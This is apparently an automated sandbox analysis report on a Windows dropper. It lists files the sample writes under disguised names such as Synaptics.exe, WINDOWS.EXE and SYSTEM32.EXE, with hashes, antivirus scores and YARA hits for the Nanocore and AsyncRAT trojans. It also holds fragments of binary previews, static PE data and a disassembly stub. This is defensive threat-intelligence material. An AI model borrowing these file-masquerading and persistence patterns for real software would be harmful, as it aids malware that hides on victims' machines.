                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.

                                                  C:\Users\user\AppData\Local\Temp\yi1yMTqS.exe

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2083328
                                                  Entropy (8bit):7.943244956522882
                                                  Encrypted:false
                                                  SSDEEP:49152:NnA21ODDkXkNpkDWti0EcFKPxqq1VVmkvavPvYMo:NAdDDetDKXiJb1VVmkM3YJ
                                                  MD5:BFF363A92AC43FF249652A83DADC02AB
                                                  SHA1:3C7B47A3F4DC3C8555B656505244886CB3A172F5
                                                  SHA-256:D054E33DE2D63966C68B44DD1D1DE8A9B7ABB76781100FE82423C80E112D4580
                                                  SHA-512:8CEEF643926251A6D6B5FFEE6E662B68580992117D98DBD24CCFDE5CDAD429CE4719A92C63F470C2857272330C9F3A4A2D7F175A6300D6B1833A387F4B841D29
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 49%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 81%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.....................B......N.... ........@.. ....................... ...........@.....................................K........?.................... ...................................................... ............... ..H............text...T.... ...................... ..`.rsrc....?.......@..................@..@.reloc........ .....................@..B................0.......H.......H...............X"...t..........................................Z(.....(....s....(....*..(....*6.(.....(....*....0.......... .a..(....(....r...p(....(....o......r...po......(.....~....-6 ....r3..p......(...............(......(....(.........~....{....~.....o....*...........0.............. ...%.....(.....s ....s!..... ....o".... ....o#...($...r;..po%........ ....s&.........o'....[o(...o).......o*....[o(...o+.....o,.....o-....s............io/.....o0.......,...o1.....o2..

                                                  C:\Users\user\AppData\Local\Temp\yi1yMTqS.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Users\user\AppData\Local\Temp\yi1yMTqS.ico

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:MS Windows icon resource - 1 icon, 32x32, 32 colors
                                                  Category:dropped
                                                  Size (bytes):4286
                                                  Entropy (8bit):5.941666555948419
                                                  Encrypted:false
                                                  SSDEEP:96:R4bEyJMGzuFNM+N1Bs5V2UFDzykPeFvSY+R1FLXjv9IEvB:ryJMG4K+N1U2KD+HShVr9BZ
                                                  MD5:4AD275D256A4E39FF58EC97B2B800D0D
                                                  SHA1:2FB93750EF528AF84F2801B2AD7D5E5358DEB5F3
                                                  SHA-256:E3F22985C4EEDA15A09D46FF127C3160E8A32F76064FB5B1DC765757CA2C47D8
                                                  SHA-512:B2747BD1019F12C8003F39744AF034FC207CF77B1F1D8EFC19B623AF8A40C4310BE91038EFDF6B233765D9FB40A6AE1E8EAB77B1E0ED1DE1D79F409A58C41CC5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...... .............(... ...@..... ..........................4/.Q3..J*..tL..9&...B<..=:..:3..Rb.eC..gdg.....148.=21.)5G...H..-L..-L..-O.e...p...D=L...'.............z{z.HHI.?A@.dH$.eS$.ZVD.}2,..4..O9..z5....(..6?.e@..q/&..CJ..8J.2. .d_a.........AIY.!-D.. =...9.."@..&B.\~....7.'.#.................IJJ.daa.vD..kW'.}k5.{0*.|0/.SA.../8..7;..26..8:..G ..;F..5>.f2..2...YD..XD..XB..*5I...2...3...7...;.Ii....0...-......... "%.........hkp.]:..RB&.i[9.u.*.{+*...3..00..13..09../8..18..;L..2:..6?..L......!...K1..5@X...*.../...1...5...,...+.. <.......'.*+-.YWY.....TRU.F0..zO..TK4.l,(...+.y-....3.~.0...7...;..0:..17..0:..0:..1=.........8...6@Y...+...(...(.......0...&. .K.413...$.?BG.....~...\Z^.P1&.B:-.i[A.g'&.t/).t-..r,-..*0../1...4../6..08../9...8..*8.........fJ..@Jb...+...#....... ..."....."+@.......%.?CD..........|..B...C>..NB/.g*(.},4.j,,.u),.w+1..0/..-2..-3..+3.{,5..-6...7.........iJ..KVk..."......................-A.....08F.edh.IFI.....uqp.s@..A.'.iP2.a)(.o+2.i)+.r)-.u,0..,...-2.~*/.z-3.z+4.z+

                                                  C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

                                                  Download File
                                                  Process:C:\Users\user\Desktop\._cache_WINDOWS.EXE
                                                  File Type:ISO-8859 text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):8
                                                  Entropy (8bit):3.0
                                                  Encrypted:false
                                                  SSDEEP:3:dQdF8tn:d48tn
                                                  MD5:08CA11A5C1C0F512CBA782C72146F31F
                                                  SHA1:A9EEE7A59F9F17593659936562486B6CB2F1F7CF
                                                  SHA-256:6F884EF1DF10DA3818A962671AC57758EB7CFBDB3EF19B7F9D74591AD6F40266
                                                  SHA-512:8107AFC5CABE9456E1CCE083D3E004C474D4E74276D5624A975E1E7CFBF6AB2FBA4E23EF3C1F227574C4D8159F5EFB22B5593D6CF0A3EBB268C54A081BD31375
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:)..5...H

                                                  C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat

                                                  Download File
                                                  Process:C:\Users\user\Desktop\._cache_WINDOWS.EXE
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):42
                                                  Entropy (8bit):4.5468465893424055
                                                  Encrypted:false
                                                  SSDEEP:3:oNWXp5vLtvvGgC:oNWXpFpva
                                                  MD5:8B8734AD46DC590CE9477D244253704A
                                                  SHA1:731628CADE04234B080F6DCAC26DAC312C09686E
                                                  SHA-256:5E1A17A6BB95D373FF27E707E303A0D737A8C82E87B6843A71CA500926192177
                                                  SHA-512:491D11D0BD35C4278429FAEBA578717B4C796C36E1FBB9DE1528D52A7D186AA660490A1DD239B8B01B9A976B1C080190895E974503CC003072B7358AF46D5431
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:C:\Users\user\Desktop\._cache_WINDOWS.EXE

                                                  C:\Users\user\Desktop\._cache_Synaptics.exe

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1082880
                                                  Entropy (8bit):6.856551135053279
                                                  Encrypted:false
                                                  SSDEEP:24576:jFYnnsJ39LyjbJkQFMhmC+6GD9vApfbZXJf:jFunsHyjtk2MYC5GDtA1
                                                  MD5:3A5072A9A5DC35DFB99A59F67C3DC6C0
                                                  SHA1:335398BB44927DDB18905221C52A89AA101A3C7F
                                                  SHA-256:29BF88F94FFAB5559B5AF5A9DB05CFDBE2BEEB81301F1E64E851CFA925C930AC
                                                  SHA-512:B3B11F8E5B495C873A8AFA58FDC2F2FEF7E7D610A50516FB701DAB1197AC11A63E5F857F9B6ECF1A9B33FDF0D875ECF59695BE83FF35AFCBC23F8293D068E8FA
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\Desktop\._cache_Synaptics.exe, Author: Florian Roth
                                                  • Rule: Malware_QA_update, Description: VT Research QA uploaded malware - file update.exe, Source: C:\Users\user\Desktop\._cache_Synaptics.exe, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\Desktop\._cache_Synaptics.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\Desktop\._cache_Synaptics.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\._cache_Synaptics.exe, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\Users\user\Desktop\._cache_Synaptics.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 93%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F..Q............m.>.....m...F...m.........3.........V...m.......m.=.....Rich............................PE..L....0.N.................z..........H2............@.......................................@.....................................<..................................`...............................H...@...............$............................text...Bx.......z.................. ..`.rdata...1.......2...~..............@..@.data...............................@....rsrc..............................@..@.reloc...............r..............@..B................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\Desktop\._cache_WINDOWS.EXE

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WINDOWS.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):208384
                                                  Entropy (8bit):7.451462755520174
                                                  Encrypted:false
                                                  SSDEEP:6144:ULV6Bta6dtJmakIM5n2B/XMekQlD/7W6Qyf0b:ULV6BtpmkbZXxVpQyf0b
                                                  MD5:568E6A074378730CEE0947C4C796372D
                                                  SHA1:7688894728B8207756F52384798E394DE8D54070
                                                  SHA-256:2F990B69464DAB55B2EBC8F6A302FE09E5767844B4AFB71B43A20A6C2EA48D8D
                                                  SHA-512:250A1215FD28E4CD5F6DA3E72B42A88F93664D4A2484D29F6141A81EF4968872B86379FB54AAF2E645D46EF8C881E43D1C32392DC3F7C381A86C252D7BDB2730
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, Author: Florian Roth
                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 88%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 98%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.T.....................d........... ........@.. ......................................................................8...W.... .. `........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc... `... ...b..................@..@................t.......H...........T............................................................0..Q........o5.......*.o6....-.&......3+..+.... ....3......1..... 2.... ....3.... .......*.*....0..E.......s7....-(&s8....-&&s9....,$&s:........s;........*.....+.....+.....+.....0..........~....o<...*..0..........~....o=...*..0..........~....o>...*..0..........~....o?...*..0..........~....o@...*..0.............-.&(A...*&+...0..$.......~B........-.(...+.-.&+..B...+.~B...*.0.............-.&(A...*&+...0..

                                                  C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\y8kdmHi6x3.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1082880
                                                  Entropy (8bit):6.856551135053279
                                                  Encrypted:false
                                                  SSDEEP:24576:jFYnnsJ39LyjbJkQFMhmC+6GD9vApfbZXJf:jFunsHyjtk2MYC5GDtA1
                                                  MD5:3A5072A9A5DC35DFB99A59F67C3DC6C0
                                                  SHA1:335398BB44927DDB18905221C52A89AA101A3C7F
                                                  SHA-256:29BF88F94FFAB5559B5AF5A9DB05CFDBE2BEEB81301F1E64E851CFA925C930AC
                                                  SHA-512:B3B11F8E5B495C873A8AFA58FDC2F2FEF7E7D610A50516FB701DAB1197AC11A63E5F857F9B6ECF1A9B33FDF0D875ECF59695BE83FF35AFCBC23F8293D068E8FA
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Florian Roth
                                                  • Rule: Malware_QA_update, Description: VT Research QA uploaded malware - file update.exe, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F..Q............m.>.....m...F...m.........3.........V...m.......m.=.....Rich............................PE..L....0.N.................z..........H2............@.......................................@.....................................<..................................`...............................H...@...............$............................text...Bx.......z.................. ..`.rdata...1.......2...~..............@..@.data...............................@....rsrc..............................@..@.reloc...............r..............@..B................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\Desktop\SYSTEM32.EXE

                                                  Download File
                                                  Process:C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):48640
                                                  Entropy (8bit):5.570150307144179
                                                  Encrypted:false
                                                  SSDEEP:768:+uC+NTdxtrhWU5GGLmo2qrqSl3bXPINKI0b8Kh9BQT3PILo/zeHnK2mtvIA6BDZy:+uC+NTdrF2AbQNKjb8Ia3PSo7eHEvXkI
                                                  MD5:807474FC253612359DC697E331F01B43
                                                  SHA1:D998BCDF573EB66781BBE931B2CA8B35492908CE
                                                  SHA-256:1E2B305D0A5CE914591F712FE0B53BE279D0EC8E598CEC95FA6CFDC6CB94C4B5
                                                  SHA-512:C2916E62D8B7B0AD214D57E2DC0DD5B0F910E06F2D070E0390612FD33C2EE416F252FBA4FE3F523114ACC14924BCFDA105A9B4379AD443F1010BB29010B83ADF
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\Desktop\SYSTEM32.EXE, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..^................................. ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........Y...v.............................................................V..;...$0.xC.=VD..b......9A../.\.....(....*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.~....*.......*.~....*.......*.~....*.......**.(>......*2~.....o?...*.s.........*.()...:(...(*...:....(+...:....('...:....((...9.....(v...*V(....s.... ...o....*n~....9....~....o..........*~~....(....9....(0...9....(@...*Vr.%.p~....(o....#...*.s...

                                                  C:\Users\user\Desktop\WINDOWS.EXE

                                                  Download File
                                                  Process:C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):979968
                                                  Entropy (8bit):6.921853304341562
                                                  Encrypted:false
                                                  SSDEEP:24576:HnsJ39LyjbJkQFMhmC+6GD9vApfbZXJfw:HnsHyjtk2MYC5GDtA1U
                                                  MD5:6278F321B0B9C85A0DF4E485A8DE7993
                                                  SHA1:48FE65A144AEE7A9B437D7C8AE9BD5BFE5409D81
                                                  SHA-256:4DC8CC4ECD4D173A024C221C61F282028BD03967C631EC6827544A36D036952A
                                                  SHA-512:FDBA000C5AB7BA6AAA4E2F94F248003D3505206B3B23AA03565BF0C36FA4C4A7654498A5002A979CB9D042E9F216FDFFF21ECB4CB57883A0B2B35B020CDFEB6D
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\Desktop\WINDOWS.EXE, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\Desktop\WINDOWS.EXE, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\WINDOWS.EXE, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\Users\user\Desktop\WINDOWS.EXE, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:unknown
                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................T....................@..........................P...................@..............................B*......0K...................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0K.......L..................@..P....................................@..P........................................................................................................................................

                                                  C:\Users\user\Desktop\y8kdmHi6x3.exe

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4171264
                                                  Entropy (8bit):7.942432292986639
                                                  Encrypted:false
                                                  SSDEEP:98304:dAdDDetDKXiJb1VVmkM2YJlAdDDetDKXiJb1VVmkM3YJ:dAdmZHJxVVm/26AdmZHJxVVm/3
                                                  MD5:46CFD9EFDDF98B4F1A57A69F3809D9BF
                                                  SHA1:5BD87CD64A90D8DDC194A9C3CA30A50F6136B7A5
                                                  SHA-256:7704A9C5892432FB9FC7598D2AA2043DDFE66774516E22081B5588B649942875
                                                  SHA-512:099FDDDBB8204118290FA34945B615C32FC43F35C014F7878541586FACB105E02845FCBBD7E3CF185BF3FDB3773F1EBF5D3E39776F3F9EDFB797D8B36DC69991
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a......................#.....N.... ........@.. ........................@...........@.....................................K.........#...................?...................................................... ............... ..H............text...T.... ...................... ..`.rsrc.....#.......#.................@..@.reloc........?.......?.............@..B................0.......H.......H...............X"...t..........................................Z(.....(....s....(....*..(....*6.(.....(....*....0.......... .a..(....(....r...p(....(....o......r...po......(.....~....-6 ....r3..p......(...............(......(....(.........~....{....~.....o....*...........0.............. ...%.....(.....s ....s!..... ....o".... ....o#...($...r;..po%........ ....s&.........o'....[o(...o).......o*....[o(...o+.....o,.....o-....s............io/.....o0.......,...o1.....o2..

                                                  C:\Users\user\Documents\BNAGMGSPLO\EEGWXUHVUG.xlsm

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:Microsoft Excel 2007+
                                                  Category:dropped
                                                  Size (bytes):18387
                                                  Entropy (8bit):7.523057953697544
                                                  Encrypted:false
                                                  SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                  MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                  SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                  SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                  SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                  C:\Users\user\Documents\BNAGMGSPLO\~$cache1

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2083328
                                                  Entropy (8bit):7.943244956522882
                                                  Encrypted:false
                                                  SSDEEP:49152:NnA21ODDkXkNpkDWti0EcFKPxqq1VVmkvavPvYMo:NAdDDetDKXiJb1VVmkM3YJ
                                                  MD5:BFF363A92AC43FF249652A83DADC02AB
                                                  SHA1:3C7B47A3F4DC3C8555B656505244886CB3A172F5
                                                  SHA-256:D054E33DE2D63966C68B44DD1D1DE8A9B7ABB76781100FE82423C80E112D4580
                                                  SHA-512:8CEEF643926251A6D6B5FFEE6E662B68580992117D98DBD24CCFDE5CDAD429CE4719A92C63F470C2857272330C9F3A4A2D7F175A6300D6B1833A387F4B841D29
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.....................B......N.... ........@.. ....................... ...........@.....................................K........?.................... ...................................................... ............... ..H............text...T.... ...................... ..`.rsrc....?.......@..................@..@.reloc........ .....................@..B................0.......H.......H...............X"...t..........................................Z(.....(....s....(....*..(....*6.(.....(....*....0.......... .a..(....(....r...p(....(....o......r...po......(.....~....-6 ....r3..p......(...............(......(....(.........~....{....~.....o....*...........0.............. ...%.....(.....s ....s!..... ....o".... ....o#...($...r;..po%........ ....s&.........o'....[o(...o).......o*....[o(...o+.....o,.....o-....s............io/.....o0.......,...o1.....o2..

                                                  C:\Users\user\Documents\BNAGMGSPLO\~$cache1:Zone.Identifier

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.943244956522882
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:y8kdmHi6x3.exe
                                                  File size:2083328
                                                  MD5:bff363a92ac43ff249652a83dadc02ab
                                                  SHA1:3c7b47a3f4dc3c8555b656505244886cb3a172f5
                                                  SHA256:d054e33de2d63966c68b44dd1d1de8a9b7abb76781100fe82423c80e112d4580
                                                  SHA512:8ceef643926251a6d6b5ffee6e662b68580992117d98dbd24ccfde5cdad429ce4719a92c63f470c2857272330c9f3a4a2d7f175a6300d6b1833a387f4b841d29
                                                  SSDEEP:49152:NnA21ODDkXkNpkDWti0EcFKPxqq1VVmkvavPvYMo:NAdDDetDKXiJb1VVmkM3YJ
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.....................B......N.... ........@.. ....................... ...........@................................

                                                  File Icon

                                                  Icon Hash:608c8c0c644c9c24

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x5ca54e
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp:0x61E2968E [Sat Jan 15 09:40:30 2022 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:v4.0.30319
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
